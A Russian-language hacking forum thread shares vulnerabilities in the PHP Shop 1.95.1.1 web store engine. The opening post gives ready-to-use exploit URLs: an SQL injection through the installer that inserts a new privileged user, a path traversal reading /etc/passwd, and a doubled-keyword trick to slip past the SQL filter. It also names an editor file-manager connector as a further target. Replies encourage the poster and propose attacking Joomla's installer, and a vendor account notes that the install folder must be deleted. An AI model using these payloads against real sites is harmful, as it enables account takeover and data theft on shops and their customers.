PHP Shop 1.95.1.1 и его дыры

[petvv]

Нарыл вот статью про этот движок, правда она относится к 1.80, но всё же решил проверить на 1.95.1.1 и вот, что получается:

хттп://хост.ru/install/install.php?install=2&CsvContent=INSERT%20INTO%20phpshop_phpshop_users%20VALUES%20(666,0,0x726f6f74,0x636d397664413d3d,0x726f6f74,1);0a2
и имеем добавление нового пользователя с соответствующими правами.

идём далее

хттп://хост.ru/install/update/install.php?SysValue[file][error]=../../../etc/passwd
конечно на локалке вы получите матангу в виде ошибки, а на реальном сервере

далее юзаем приложенную форму (править на свой хост) :

смотрим и удивляемся, какой кривой движок однако, из-за registerglogal==On

а вообщев этом файле, т.к. отсутствует рекурсивная проверка на инструкции, а стоит однократная проверка Тьюринга, то вообще можно извращаться над БД как угодно:

unionunion selectselect 1,2,3,4 from phpshop_(ну или другой префикс базы)name

Пока это усё, проверяю описанный

phpshop/admpanel/editor2/editor/filemanager/browser/defolt/connectors/php/connector.php

далее по результатам отпишусь, но сегодня тяжко, после бани с :az: тяжко

Жду ваши мнения, предложения, пожелания

 

[sergyboiko]

Весьма познавательно. Надо бы на инсталляторе джумлы поиздеваться. Из пожеланий хочу добавить - ПИШИ исчо

 

[PHPShop]

Магазин не может работать с инсталлятором на UNIX, есть проверка па папку install ее нужно удалять.
Если скрипт видит, что запущен на винде, то удалять не просит, но смысл инклюдить у себя на денвере?